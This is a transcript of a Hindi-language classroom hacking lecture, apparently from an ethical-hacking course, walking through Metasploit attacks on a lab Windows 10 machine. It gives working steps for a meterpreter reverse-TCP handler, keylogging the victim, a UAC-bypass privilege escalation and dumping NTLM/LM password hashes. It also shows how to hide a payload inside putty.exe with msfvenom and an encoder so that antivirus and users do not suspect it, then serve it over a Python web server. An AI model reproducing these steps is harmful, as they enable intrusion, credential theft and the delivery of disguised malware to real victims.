रिज्यूम रिकॉर्डिंग। सिस्टम हैकिंग हमारा मैंने कल आपको मेटास्प्लॉइट फ्रेमवर्क कराया था। एंड द वन मोर थिंग इज कि ना कल का आपने ना एक चीज और आप भूल गए जो मैंने कल आपको बोली थी। और आपने ना मेनली प्रॉब्लम क्यों बोले, क्योंकि किसी ने रिवीजन नहीं किया, इसलिए किसी ने मांगा भी नहीं। मैंने सबसे कहा था कि मैं आपको ये RDF प्रैक्टिकल वाली वीडियो प्रोवाइड करूंगा, बट मैं देना भूल गया, बट आपने भी नहीं मांगा। चलिए मैं आज दे दूंगा आपको। तो आज आप लोग RDP प्रैक्टिकल का ये मिल जाएगा आपको। प्रिविलेज एस्केलेशन मैं आपको करा रहा था, फिर मैंने आपको मेटास्प्लॉइट फ्रेमवर्क आपको सिखाया कि मेटास्प्लॉइट फ्रेमवर्क कैसे यूज करते हैं। एंड नाउ हम लोग प्रिविलेज एस्केलेशन पर ही दोबारा लौट के आ गए कि ठीक है प्रिविलेज एस्केलेशन करते हैं, बट बिफोर दैट और चीजें कुछ करना बाकी है। जैसे कि विंडोज को पहले हैक करना, कि मेटास्प्लॉइट फ्रेमवर्क चालू है ना, कि मेटास्प्लॉइट फ्रेमवर्क को के थ्रू विंडोज को कैसे हैक करते हैं। उसके बाद हम आएंगे प्रिविलेज एस्केलेशन अटैक पर। ठीक है, तो मैं ये प्रिविलेज एस्केलेशन अटैक के लिए मॉड्यूल मतलब एक मेथड एक वो है प्रोसेस। तो मैं पहले आपको ये दिखा देता हूँ कि एक विंडो को कैसे हैक किया जाता है। तो ये मेरी विंडोज मशीन है, ठीक है। आईपी एड्रेस दिखाने की वैसे ज़रूरत तो नहीं है, बट 153 इसका आईपी एड्रेस है। ओके, तो यहाँ पर आ जाते हैं। तो ये आपको मैंने कल बताया था MSF विनम। एक मिनट, MSF विनम से हम लोग पेलोड क्रिएट करते हैं, राइट। अच्छा, मैंने कल विंडो हैक करके दिखाई थी क्या? हाँ, रिमोटली एक्सेस किया था अरे क्लास में। तो मुझे बताओ ना, तुम लोग मुझे बता भी नहीं रहे हो तो मुझे। ये तो आगे का है ना। हाँ, हम लोगों को आगे करना है, आगे का प्रोसेस करना था। तो ये हो गया था, विंडो हैक हुई थी। हाँ या यस, हाँ, ये की स्कैन स्टार्ट और ये डंप वाली कमांड आपने करने को ये बोला था मैंने कि स्कैन स्टार्ट करना, देन स्कैन डंप कर लेना, और उसके बाद स्कैन स्टॉप कर देना, तो डेटा मिल जाएगा आपको। वैसे मैं चाहूँ तो दोबारा भी करा सकता हूँ। तो लेट मी मैं MSF कंसोल को मैं लोड करा लेता हूँ पहले। अब मैं आपको प्रिविलेज एस्केलेशन अटैक दिखाऊंगा, लेकिन उससे पहले मतलब प्रिविलेज एस्केलेशन अटैक कैसे किया जाता है। आप एक प्रिविलेज एस्केलेशन अटैक में नॉर्मल यूजर एडमिन यूजर बनने का ट्राई करता है, कोशिश करता है, राइट। तो पहले हम नॉर्मल यूजर तो बन जाएं, अभी तो हम नॉर्मल यूजर भी नहीं है। तो यूज एक्सप्लॉइट मल्टी हैंडलर ऑप्शन सेट करेंगे। ऑप्शंस में सेट पेलोड विंडोज स्लैश METR मीटर प्रीटर स्लैश REVRSC रिवर्स अंडरस्कोर TCP। ठीक है, एंड एल होस्ट सेट एल होस्ट। अच्छा, आईपी एड्रेस क्या है उसके अंदर, और अभी मेरा आईपी एड्रेस क्या है। सो लेट मी चेक माय आईपी एड्रेस। 142 है। तो क्या कल भी मेरा आईपी एड्रेस 142 था? पता नहीं। 192.168.1.142 एल होस्ट है, एल पोर्ट भी सेट है, सारी चीजें मुझे सेट ही नजर आ रही हैं। नाउ द जस्ट एक्सप्लॉइट इट। तो ये एक्सप्लॉइट कर देगा, और यहाँ पर मैं आता हूँ तो यहाँ वायरस के अंदर मेरा नहीं, डाउनलोड के अंदर मेरा वायरस पड़ा हुआ पेलोड 1.exe। मैं इसको ओपन करता हूं और रिवर्स शेल आ जाना चाहिए। ठीक है, सो हाँ ये आ गया, आईपी एड्रेस सारी चीजें ठीक है। तो चलिए, अब क्या था, ये वाला चल रहा था कि मैं PS करूंगा, और PS में मुझे आएगा डेस्कटॉप नजर, नहीं एक्सप्लोरर आएगा, explorer.exe, जिसका PID है 3060। ठीक है, तो MIG माइग्रेट करूंगा 3060 को, तो ये माइग्रेट पे चला जाएगा। 3060 माइग्रेशन गेट UID
सॉरी गेट UID नहीं, गेट PID 3060. Okay, now key scan START, की स्कैन स्टार्ट. मैंने की स्कैन स्टार्ट कर दिया. नाउ अब मैं विक्टिम वाले कंप्यूटर पे जाऊंगा. विक्टिम अपना कोई भी वर्क परफॉर्म करेगा. मोस्टली या तो नोटपैड में कुछ टाइप करेगा, राइट, जैसे कि आई एम साइबर सिक्योरिटी हैकर एंड माय पासवर्ड इज AST. तो इस टाइप से कुछ किया. कुछ भी एडिट करेगा, पर्सनल डॉक्यूमेंट खोलेगा, ईमेल एड्रेस टाइप करेगा, कमांड लगाएगा कोई भी, राइट, एनी कोई भी कमांड लगा सकता है. तो ये सब ना रिकॉर्ड होता रहेगा. एंड आफ्टर द रिकॉर्डिंग, मतलब जो हमें लगे, जब अटैकर को लगेगा कि हाँ यार काफी कुछ रिकॉर्ड हो चुका है, नाउ चलो डंप करके देखते हैं कि क्या क्या डेटा आया है. तो जो भी डेटा है वो देखो ये रहा. सारी चीजें मिल गई जो भी. अब हमें इसको स्टॉप करना है तो अब आप स्टॉप भी कर सकते हो कि अब मुझे कोई. अच्छा, ये जो मैंने की स्कैन डंप किया है तो ये डंप हुआ है, अभी भी एक्टिवेटेड ही है कीलॉगर, राइट. अभी भी मैं कोई और कमांड चलाऊंगा, जैसे कि ये मैंने चला रहा हूं, ठीक है. अब मैं दोबारा से इसको शो करा देता हूं, DUMP डंप. देखा, अभी भी चल ही रहा है ये. तो मैं इसको स्टॉप कर सकता हूं. स्टॉप हो गया, अब नहीं है. चाहिए नोटिफिकेशन किस चीज का आया था, स्पाईवेयर का. वो तो देगा ही ना. हैक हैक हो गई है विंडो तो ये हो गया. अब मैं थोड़ा सा आपको लेके चलता हूं कि विंडोज हैकिंग करना थोड़ा जरूरी था, क्योंकि मुझे दिखाना था आपको प्रिविलेज एस्केलेशन अटैक, राइट. तो अब मैं आपको थोड़ा सा सिग्निफिकेशन दिखा देता हूं प्रिविलेज एस्केलेशन अटैक के लिए, कि ये मैंने विंडोज को हैक किया हुआ है. ठीक है. तो ये मैंने विंडोज. अच्छा, एक चीज और दिखा देता हूं मैं आपको, कुछ और भी है, कुछ इंपॉर्टेंट. इफ इट इज पॉसिबल. अच्छा, इसमें नहीं है. मैंने आपको ये तो बताया ही था ना कि अगर जैसे कि ये है तो गेट UID करके आप चेक कर सकते हो कौन सा यूजर आपने एक्सेस किया हुआ है. मैंने सैम 10 वाला यूजर एक्सेस किया हुआ है, राइट. या फिर SYS sys इन्फो कमांड से भी आप देख सकते हो कि आपने नॉर्मल ये डिटेल है, ये डिटेल आई हुई है और नॉर्मल वाला यूजर आपने एक्सेस किया हुआ है, राइट. अब आपको क्या बनना है, एडमिनिस्ट्रेटर बनना है, एडमिन बनना है, राइट. तो मैं एडमिनिस्ट्रेटर या फिर एडमिन बनने की कोशिश करता हूँ. और अभी मेरे पास नॉर्मल यूजर अथॉरिटी है. अब मैं क्या करूंगा, मैं प्रिविलेज एस्केलेशन की टेक्निक का इस्तेमाल करूंगा, राइट. तो ये मेरे पास है गेट मिड. सबसे पहले यहाँ पे लिखा हुआ है कि प्रिविलेज एस्केलेशन अटैक करने से पहले आपके पास मीटर पेटर शेल होना चाहिए. मेरे पास मीटर पेटर शेल है. नाउ गेट सिस्टम आप कमांड टाइप करोगे, गेट सिस्टम, तो ये आपको दिखाएगा कि यू हैव अ प्रॉपर एडमिन परमिशंस और नॉट. तो ये यहाँ पे एरर्स आ रही है, मतलब मेरे पास एडमिन परमिशंस नहीं है श्योरिटी के लिए, ठीक है. तो मैंने श्योरिटी दिखा दी आपको कि हाँ मेरे पास परमिशंस नहीं है. और उसके बाद मैं क्या करूंगा, बैकग्राउंड कमांड से अपने इस सेशन को बैकग्राउंड कर दूंगा. लेकिन इसका मतलब ये नहीं कि मैं बाहर आ, मतलब बाहर आया हूं, बट वो अभी भी विंडो हैक्ड ही है. मैं जब चाहूं उसके अंदर भी जा सकता हूं बाय यूजिंग द सेशन -i एंड देन जो इसका जो एक्टिव सेशन आईडी क्या है, सेशन आईडी है अभी 1. ऐसे एंटर मारूंगा तो फिर से मैं उसके अंदर ही चला जाऊंगा, राइट. तो इस तरीके से तो मैं दोबारा बाहर आ जाता हूं. और क्या करना है मुझे, मुझे अब यहाँ पे पोस्ट का यूज करना है, राइट. तो मैं यूज एक्सप्लॉइट विंडोज लोकल ASK, विंडो एक्सप्लॉइट विंडोज लोकल ASK. ASK क्या होता है,
ASK कुछ था, पता नहीं, जो भी है ASK था कुछ। ये बड़ी अभी फिलहाल ये एक्सप्लॉइट है, तो यूज एक्सप्लॉइट विंडोज लोकल ASK एक्सप्लॉइट है, मैंने इसको यूज किया, यूज हो गया ये, ठीक है। यहाँ पे ये देखो मल्टी हैंडलर था, अब यहाँ पे विंडोज लोकल ASK आ रहा है। नाउ अब मैं ऑप्शंस कमांड को रन करूंगा और देखूंगा मुझे रिक्वायरमेंट क्या क्या है और मुझे प्रोवाइड क्या करना है, ठीक है। तो ये IP एड्रेस सेट है, सारी चीजें, फाइल नेम, पाथ, सेशन, टेक्निक, EXE, ये सारी चीजें दिखा रहा है वो। तो मुझे क्या सेट करना है, वी नीड टू सेट सेशन एंड टेक्निक। तो हम सेट सेशन 1 करेंगे। मेरे पास ये जो सेशन था, ये वाला कौन सा सेशन है, सेशन नंबर 1 है, तो मैं इस सेशन को सेट करूंगा, ठीक है। तो सेट सेशन 1, सेट टेक्निक PSH, ये PSH मैं टेक्निक सेट कर रहा हूं। एक एक होती है आपकी EXE, एक होती है आपकी PSH यानी कि पावर शेल, एग्जीक्यूटिबल फॉर्म में या पावर शेल फॉर्म में, राइट। तो मैंने PSH दे दिया, तो मैं पावर शेल यूज करूंगा बाईपास करने के लिए। एक तो होता है EXE का तरीका यूज करके, एग्जीक्यूटिबल फाइल का तरीका यूज करके, यानी कि एक एग्जीक्यूटिबल फाइल मैं सेंड करूंगा बैकडोर बनाकर विंडोज 10 के अंदर, और वो मुझे एडमिन एक्सेस दे देगा। हो सकता है ना दे, तो फिर हम यूज करते हैं पावर शेल का। पावर शेल के अंदर ज्यादा पावर होती है, मोस्टली विंडोज को, विंडोज के डिफेंडर को, विंडोज के एंटीवायरस को आज के टाइम पर अगर कोई बाईपास कर पा रहा है तो सिर्फ पावर शेल कोडिंग। विंडोज कोडिंग पूरी तरीके से बेकार हो चुकी है, बैश स्क्रिप्टिंग जिसे बोलते हैं। तो मैं पावर शेल का यूज करूंगा, और पावर शेल यूज करने के बाद मैं क्या करता हूँ, एक्सप्लॉइट को रन करता हूँ कि मैंने पुराने वाले सेशन का इस्तेमाल कर रहा हूँ, सेशन 1 का, और पावर शेल टेक्निक से मैं एक्सप्लॉइट कर रहा हूँ। तो ये देखो, तो यहाँ पे मैंने ये चल रहा है इधर मेरे मुझे विंडो में कुछ एक्टिविटी हो रही है। मैं विंडो ओपन करता हूँ तो ये देखो यहाँ पे विंडोज में एक्टिविटी हो रही है कि ऑटोमेटिक यहाँ पर ये परमिशन के लिए आस्क कर रहा है, राइट। तो मैं इसे यस कर देता हूँ। तो UAC, यूजर एक्सेस कंट्रोल ने ऑटोमेटिक इसको परमिशन दे दी, क्योंकि इसके मतलब इस विंडो के अंदर इंटरनली एक वायरस छोड़ा गया और UAC ने परमिशन पूछा। तो यहाँ पे क्या हुआ, मीटरप्रिटर सेशन 2 ओपन, राइट। तो अब मुझे मीटरप्रिटर सेशन 2 मिल चुका है, राइट। तो मुझे मीटरप्रिटर सेशन 2 मिल गया। अब मैं इसको चेक करता हूं, तो देखो अब मैं कौन सी कमांड चलाऊंगा, गेट SYS सिस्टम। गेट सिस्टम कमांड से हम वेरिफिकेशन करते हैं कि क्या मैं एडमिन यूजर हूं या नहीं। सो लुक एट दैट। तो अब यहाँ पर कोई एरर नहीं आई, इसने टेक्निक 1 बताया और मेमोरी एडमिन इस तरीके से बोल रहा, तो मतलब कोई एरर नहीं है, मतलब मैं एडमिन यूजर ही हूं इस टाइम। तो मैं फाइनली प्रिविलेज एस्केलेट कर चुका हूं, मैं नॉर्मल यूजर से एडमिन यूजर में कन्वर्ट हो चुका हूं। नाउ अब मैं शेल करता हूं, शेल कमांड, सेल से अंदर जाता हूं, अंदर आ गया, और अंदर आने के बाद मैं एक कमांड रन करता हूं, हु एम आई। तो क्या आ रहा है, हु एम आई में एंटी अथॉरिटी सिस्टम, समझ गए, एंटी अथॉरिटी सिस्टम आ रहा है। जबकि जो शेल 1 था, ये वाला सेशन 1, इसमें जब मैंने विंडो हैक की थी तो वहां पे सैम 10 वाला यूजर था, लेकिन यहाँ पर ये वाला यूजर आ रहा है। तो मैं आपको दिखा देता हूं, जैसे कि मैं, ये नॉर्मल विंडो है, नॉर्मल विंडो को मैं रन करूंगा हु एम आई, तो ये दिखाएगा सैम 10, ठीक है। लेकिन वहीं अगर मैं CMD राइट क्लिक करके एडमिनिस्ट्रेटर करता हूं, ठीक है, और उसके बाद हु एम आई करूंगा, तो ये सैम 10 इस पे दिखा रहा है, इस पे नहीं दिखाना चाहिए सैम 10, एंटी अथॉरिटी सिस्टम दिखाता, बट हाँ एंटी अथॉरिटी सिस्टम तो है ही ये, हु एम आई, ये एंटी अथॉरिटी सिस्टम ही है, बस नाम ये डेस्कटॉप का ही दिखा रहा है। पूछो क्यों, क्योंकि लॉग्ड इन यूजर कौन है, सैम 10। सैम 10 यूजर विंडोज के अंदर अभी लॉग्ड इन यूजर है। अगर मैं लॉग आउट करके एज ए एडमिनिस्ट्रेटर लॉग इन करूंगा, तो फिर मुझे क्या दिखाएगा, एंटी अथॉरिटी सिस्टम ही दिखाएगा। तो मैंने डायरेक्टली एंटी अथॉरिटी सिस्टम का एक्सेस ले लिया है, यानी कि एडमिन का एक्सेस मिल चुका है, जस्ट बिकॉज ऑफ इस वाले एक्सप्लॉइट के थ्रू। इस एक्सप्लॉइट का यूज किया मैंने और वो काम हो गया। नाउ मैं हु एम आई हो गया, हु एम आई अब मैं क्या करूंगा, मैं एग्जिट करूंगा, ये एग्जिट हो गया।
नाउ कंपेयर बोथ शेल। अब हम दोनों शेल्स को कंपेयर करेंगे, ठीक है, सेशन 1 वाली और सेशन 2 वाली। सेशन 1 वाली नॉर्मल यूजर है, सेशन 2 वाली एडमिन यूजर है। तो मैं अब इसको बैकग्राउंड करूंगा, बैकग्राउंड, ठीक है। तो बैकग्राउंड क्या किया मैंने, सेशन 2 को मैंने बैकग्राउंड कर दिया। और नाउ अब मैं कंपेयर करने के लिए यूज पोस्ट विंडोज गैदर विन प्रिविलेज, विंडोज प्रिविलेज यूज करूंगा एंड देन सेट सेशन 1। मैं यूज कर रहा हूं विंडोज प्रिविलेज वाले एक्सप्लॉइट का, पोस्ट को यूज कर रहा हूं मैं। और सेट सेशन 1 मैंने सेट कर दिया। नाउ रन करता हूं तो ये मुझे दिखा रहा है अथॉरिटी, हाउ मच अथॉरिटी आई हैव एज विंडोज 10 यूजर। सो दिस इज द अथॉरिटी, विंडोज प्रिविलेजेस, राइट। नाउ सेट सेशन 2 करता हूं मैं। अब मैं रन करता हूं। अब देखो एंटी अथॉरिटी वाला जो यूजर है, एडमिन यूजर पर अथॉरिटी देख लो कितनी सारी है, लिस्ट की लिस्ट है। और इस पर 2-4 थी। तो समझ गए, एडमिन यूजर पर अथॉरिटी ज्यादा होती है, नॉर्मल यूजर पर अथॉरिटी कम होती है। तो अब मैं क्या करता हूं, मैं इसको जो है सेशन आईडी से सेशन चेक करता हूं। 2 सेशन है मेरे पास, दोनों में दिखा रहा है मुझे कि हाँ डेस्कटॉप ये नॉर्मल यूजर है और नीचे वाला यूजर एंटी अथॉरिटी सिस्टम है, यानी कि ये है आपका एडमिन वाला यूजर, ठीक है। तो मैं इसको क्या करता हूँ, सेशन -i और लॉगिन कर लेता हूँ सेशन 2 में, एंटी अथॉरिटी वाले सेशन में। या फिर सॉरी, बैकग्राउंड करता हूँ। पहले मैं 1 में करता हूँ और यहाँ पर मैं आपको एक कमांड रन करा के दिखा देता हूँ, हैज डंप। तो ये चलाएगा नहीं इस कमांड को, ठीक है। और वहीं अगर मैं बैकग्राउंड कमेंट करता हूं और फिर से मैं सेशन -i और सेशन 2 को लॉगिन करता हूं और फिर जब मैं हैश डंप कमांड चलाता हूं तो इसको भी नहीं दिखा रहा, क्या कह रहा, पैरामीटर इनकरेक्ट, गलत पैरामीटर यूज कर रहा हूं क्या। हो सकता है मैं गलत पैरामीटर यूज कर रहा हूँ। सॉरी, बैक नहीं, बैकग्राउंड होता है, BAC के बैकग्राउंड। So when you admin run the get system command and use this post. Okay. Use post windows gather hash dump, ठीक है। तो मैंने ये यूज किया। अच्छा, सेशन सेट करके रखना, सेशन कौन सा सेट किया हुआ डिपेंड ये भी करता है। तो मैं सेट सेशन 2 कर देता हूँ और दोबारा से इसको यूज कर लेता हूँ। और नाउ मैं इसको सॉरी एक्सप्लॉइट करता हूँ। तो ये देखो, इसने क्रैक कर दिया सैम और सिस्टम फाइल के अंदर का डेटा, यानी कि हैश डंप कर दिया। समझ गए, हैश को इसने डंप कर दिया। NTLM और LM हैश दोनों ही आ गए, एडमिनिस्ट्रेटर के, गेस्ट के, डिफॉल्ट अकाउंट के, जो किसी यूजलेस नहीं है, मतलब यूजलेस है हमारे लिए तो सैम 10 का भी आ गया। क्यों आ गया, क्योंकि सेशन जो सेट सेशन 2, यानी कि सेशन 2 में सेशन 2 वाला जो बंदा है ना, वो उसके पास जो अथॉरिटी है ना, वो एडमिन वाली अथॉरिटी है, इसलिए हम इसको डंप कर पाए। वहीं अगर मैं ये कर दूं कि सेट सेशन 1 नॉर्मल यूजर, ठीक है, तो ये नहीं कर पाएगा क्योंकि इस पर इसके पास इतनी अथॉरिटी नहीं है। ये सैम 10 यूजर है, उसको बोल भी रहा है एक्सेस डिनाइड, राइट। तो ये था आपका प्रिविलेज एस्केलेशन अटैक, और हमने वेरीफाई भी कर लिया कि हाँ सेशन 2 के पास ज्यादा अथॉरिटी है और सेशन 1 के पास अथॉरिटी कम है।
तो ये कह रहा है अब मैं डायरेक्टली एग्जिट कर रहा हूं, तो मैं डायरेक्टली एग्जिट नहीं हो सकता। क्यों? क्योंकि मेरे पास अभी 2 सेशन एक्टिव हैं। तो अगर मैं फिर भी एक्टिव एग्जिट करना चाहता हूं, दोनों को कैंसिल करके, तो मैं वाई लगाऊंगा एंड देन बाहर आ जाऊंगा, राइट। अभी यहाँ पे क्या चल रहा है कि अब कुछ और नया है। नया ये है कि हाउ टू बाइंड अ पेलोड इन ओरिजिनल ओरिजिनल EXE फाइल। अब ये तो वायरस था जो आपने देखा, जो इजिली कोई भी एंटीवायरस डिटेक्ट कर लेगा और पकड़ लेगा इसको, राइट। क्योंकि समझ में नहीं आ रहा है ये कौन सा सॉफ्टवेयर है, क्या है ये, मतलब इसको रन करता हूँ कुछ होता ही नहीं है, तो इजीली आप इसे डिलीट ही करोगे, नॉर्मल व्यक्ति में इसे डिलीट ही करेगा, राइट। तो मेरे पास एक एक कॉमन फाइल है जिसका नाम है putty.exe। होप यू विल नो अबाउट द putty.exe। तो मैं इसको सबसे पहले डाउनलोड कर लेता हूँ, putty.exe। तो आप में से कौन कौन जानता है putty.exe को? मैं ओके, ठीक है। विंडोज पर SSH कनेक्शन लेने के लिए या टेलनेट कनेक्शन लेने के लिए, या मल्टीपल बहुत सारे फीचर हैं इसके अंदर, पुटी के अंदर, वो लेने के लिए आप जो है पुटी का यूज करते हो। तो ls putty.exe तो काफी ज्यादा यहाँ पर फाइलें हैं। तो putty.exe यहाँ पर है मेरा, ये रहा putty.exe। एक जेन्युइन सॉफ्टवेयर है ये, प्लस ये ना स्टैंड अलोन सॉफ्टवेयर है। सबसे मेन चीज तो ये putty.exe एक स्टैंड अलोन सॉफ्टवेयर है जिसको मैं रन करूंगा और ये डायरेक्टली ओपन हो जाएगा, इसको इंस्टॉल नहीं होना पड़ेगा। इसलिए मैंने putty.exe यूज किया है। तो मैं क्या करता हूं, मुझे अपना जो वायरस है, जो पेलोड है, वो एक ओरिजिनल फाइल के अंदर डालना है, ताकि विंडोज का जो डिफेंडर है वो भी बाईपास कर दे, उसको पहचान ना पाए उसको, और ना नॉर्मल यूजर भी इजीली उस किसी भी एप्लीकेशन पे ना डाउट ना करे। जैसे कि मैंने अगर ये उससे बोला कि भाई ये मैं क्रैक वर्जन यूज कर रहा हूँ, तो वो ना बिलीव करना चाहिए कि हाँ क्रैक वर्जन यूज कर रहा है, और उसी के अंदर हमारा वायरस होना चाहिए। तो उसके लिए मैं यूज करूंगा ये, इसको क्या हो गया, अच्छा ये कमांड ऊपर हो गई है, चलो ठीक है। MSF वेनम, चीजों में चेंजेस लाने पड़ेंगे। MSF वेनम -A फॉर आर्किटेक्चर। आर्किटेक्चर मैं बना रहा हूं 32 बिट में, x86 32 बिट आर्किटेक्चर की एप्लीकेशन बनानी है। एंड हाइफन प्लेटफॉर्म प्लेटफॉर्म विंडोज एंड -XPUTTY.exe putty.exe -x मतलब उस ओरिजिनल फाइल का नाम दो, putty.exe मैंने नाम दे दिया। एंड आफ्टर दैट -K पेलोड विंडोज मीटरप्रेटर रिवर्स TCP एल होस्ट ये है, एल पोर्ट ये है, -E एनकोडर्स मैं यहाँ पे लगाने वाला हूँ। एनकोडर है हमारा शिकाता का नाई, ठीक है। तो मैंने बताया भी था कि मैं एनकोडर यूज करूंगा। एल पोर्ट के बाद -E and x86 slash shikataganai shikataganai and -I 1 -B for the bad characters /x00 -F /x00 always be a bad character। हमेशा ये बैड कैरेक्टर ही होता है /x0 ये हैशडम्प वैल्यू है /x00, ठीक है। और भी डिपेंड करता है, फिर और भी बैड कैरेक्टर्स होते हैं, बनते हैं, लेकिन ये बाय डिफॉल्ट होता ही होता है। बट बाकी जो है बैड कैरेक्टर्स चेंज होते रहते हैं, ठीक है। तो ये मैंने ये पूरा का पूरा पेलोड डाल दिया -FEXE और आर्किटेक्चर हटा लो यहाँ से, और यहाँ पे -O का यूज किया जा रहा है। आप ग्रेटर देन की जगह -O का भी यूज कर सकते हो। और मैं यहाँ पे इसका पेलोड का नाम चेंज कर देता हूँ। मतलब यहाँ पे ना मैं ना यहाँ पे एक काम करता हूँ, PUTTY पुटी, पुटी का नाम, क्योंकि पुटी मेरे पास रियल सॉफ्टवेयर
ऑलरेडी अवेलेबल है, बट मैं ना उसी के अंदर वायरस डाल के दूसरी कॉपी बना रहा हूँ। तो पुटी वायरस डाल देता हूँ, पुटी वायरस डॉट एक्सी, एंड मे बी ये शायद, चलो ट्राई मारते हैं, तो ये क्रिएट करेगा अब इसको। सो फाइनली द फाइल हैज बीन क्रिएटेड, ठीक है। तो वायरस पुटी वायरस डॉट एक्सी फाइल बन गई है, और बस इतना काफी है कि हाँ, हमने एक रियल ओरिजिनल फाइल के अंदर अपना वायरस डाल दिया है, ठीक है। तो ये रहा, सॉरी यहाँ पे ये रियल पुटी है, और ये फेक पुटी, ठीक है। और मैं इसको ट्रांसफर करूंगा अब इस वायरस को विंडोज मशीन या विक्टिम मशीन के अंदर। तो पाइथन 3-m HTTP सर्वर पोर्ट नंबर 80, ठीक है, 192.1.142 putty.virus.exe, ये वो फाइल है जिसको मुझे डाउनलोड करना है। फाइल डाउनलोड हो चुकी है, ठीक है। यहाँ पे आ गई वो फाइल, और अब मुझे पाइथन सर्वर को स्टॉप कर देना है, और यहाँ पे मैं MSF कंसोल स्टार्ट कर लेता हूँ। तो यहाँ पे यूज एक्सप्लॉइट मल्टी हैंडलर ऑप्शंस सेट lhost 192.168.1.142, right, or anything else? Nothing, just exploit the command, ठीक है। हैंडलर स्टार्ट हो चुका है, और अब हम विक्टिम वाले कंप्यूटर पे जाएंगे, और पुटी, ये रहा पुटी वायरस डॉट एक्सी को मैं रन करूंगा, ओपन करूंगा, to find a version of the PC. This app can't run on your PC. क्यों? कनेक्शन देखो स्टार्ट हो रहा है, वेरिएबल विल बी क्लोज एक्सप्लॉइट, क्या प्रॉब्लम है? इतने सारे कनेक्शन बन रहे हैं, बिगड़ रहे हैं, कुछ तो हुआ है। मुझे डाउट तो हो रहा था किसी चीज पर, वो पता नहीं क्या था, मेरे मन में डाउट था इस चीज को लेके, क्योंकि ये वायरस बना है, बट ना पुटी वाला सॉफ्टवेयर का फेस नहीं है ये, क्योंकि इस वायरस को ऐसा बनना चाहिए था। ये है रियल रियल ओरिजिनल एपीके EXE फाइल, सेम टू सेम इसको ऐसा बनना चाहिए था, बट ये अभी तक पूरी तरीके से वैसा कन्वर्ट नहीं हुआ, राइट। तो क्या प्रॉब्लम हो सकती है? कमांड देखता हूं मैं। सर -F के बाजू में exe लिखा। -F के साइड में क्या है? exe लिखा, वो ये पिंक कलर में क्यों कन्वर्ट नहीं हुआ वो कमांड? ये सारे सब ये करेक्ट है, इसलिए पिंक में कन्वर्ट हो गया। नहीं समझ नहीं आ रहा आप क्या बोल रही हो। ये -F आपने लिखा है वो ग्रीन में ही है अभी। जो सारे ऊपर के कमांड है -A -X, उसका कलर चेंज हो गया। ओ अच्छा, समझ गया। अच्छा, मुझे आपका ये वर्ड सुनाई नहीं दे रहा था। अब आप ना, मुझे ना पिंग पिंग सुनाई दे रहा था, कि पिंग ऐसा मैंने क्या लगा दिया, ग्रीन बोलना है, ग्रीन ग्रीन है सर, तो मुझे पिंग सुनाई दे रहा। तो लेट मी क्रिएट वंस अगेन दिस वायरस। ये अच्छा है, लाइनक्स ने ना इतना कैपेबिलिटी दे दी कि आप ना इजीली पता लगा लेते हो कि हाँ ऑप्शन ये वाले हैं, एंड देन ये हैं हमारे वर्ड जो हमने टाइप किए अपनी तरफ से। फाइनली ये क्रिएट हो गया, ठीक है। अब मैं वंस अगेन मैं इसको ट्रांसफर कर देता हूँ, या तो डायरेक्टली ट्रांसफर कर देता हूँ, ये लो, ठीक है। अब आया ना रियल फेस इसका।
चलिए अब मैं ओपन करता हूं। अब ये कोई सॉफ्टवेयर ही है, पुटी सॉफ्टवेयर, मैं से ओपन करूंगा तो ये इस तरीके से ओपन हो गया। लग ही नहीं रहा कि ये कोई वायरस है, राइट। और यहाँ पे मुझे इसका शेल तो मिल रहा है बट डेड हो रहा है ये। या तो ये इसलिए हो रहा है क्योंकि हम ऑलरेडी इसमें पहले वो रन कर चुके हैं। तो मुझे ना एक बार वो करना पड़ेगा, टास्क मैनेजर में जाना पड़ेगा। वो सर्विस पहले चल चुकी है ना इसमें, या फिर ना एक बार मैं रीस्टार्ट मार देता हूँ विंडोज को। तो हम लोग बाईपास पी -P विंडोज मीटर प्रिंटर रिवर्स टीसीपी और एनकोडर शिकादा का नहीं लगा हुआ है। विंडोज मीटर प्रिंटर रिवर्स टीसीपी लोएस्ट एलपोर्ट x86 शिकादा का नहीं, और -i की वैल्यू यहाँ पे 5 दी गई है, वैल्यू बढ़ा दी गई है, ठीक है। और यहाँ पे जो बैड करेक्टर्स है वो सिलेक्ट 0 ही रहेगा। एंड देन -f exe, और फिर आप जो चाहो मतलब वैसा नाम दे सकते हो। तो मैं exe ग्रेटर देन, यहाँ पे मैं पेलोड 2.exe प्रोवाइड कर देता हूँ, ठीक है। सर्विस तो कोई चल नहीं रही है। चलो रीस्टार्ट करने की वैसे जरूरत नहीं है। तो यहाँ पे देखो ये अब बन चुका है पेलोड 2 के नाम से, पेलोड 2.exe। अच्छा वाह, ये यहाँ पे चीजें बहुत ज्यादा खराब हो गई हैं। ये है डेमो, ठीक है। तो ये हो गया। अब मैं एलएस करता हूँ तो थोड़ा सा अब अच्छा लग रहा है। तो यहाँ पे पेलोड 2.exe मेरा बन गया है। जाहिर सी बात है मैं इसे ट्रांसफर करूंगा। यहाँ आता हूँ और यहाँ पे सारी चीजें ऑलरेडी सेट है, कुछ खास डिफरेंस नहीं है। मैं इसी पहले से हैंडलर पहले से स्टार्ट ही है, राइट। इसको जस्ट एक और बार स्टार्ट कर देता हूँ मैं, पहले से सेट ही है। तो यही लिसनिंग वाला काम कर लेगा इसके लिए, ठीक है। तो मैं ओपन कर देता हूँ इसको। दिस ऐप कांट रन ऑन योर पीसी, तो टू फाइंड अ वर्जन ऑफ योर पीसी जस्ट क्लोज दैट। ओ क्या रीजन हो सकता है? मे बी शायद आई फॉरगेट सम थिंग्स related to the UAC. Let me check something. बाईपास यूएससी इन विंडोज 10 यूजिंग बाईपास कॉम हाईजैक। विंडोज 10 ही यूज हो रही है तो फिर क्या प्रॉब्लम है? कहीं ये ऐसा तो नहीं है अपडेट हो गई हो, क्योंकि सॉफ्टवेयर को रन नहीं करने दे रही ना। सर सेम एरर पहले भी आई थी ना, जब पुटी को आपने इस तरह से बनाया यस था। यस यस। तो सर फिर से आपने कमांड में स्पेस नहीं डाला होगा।
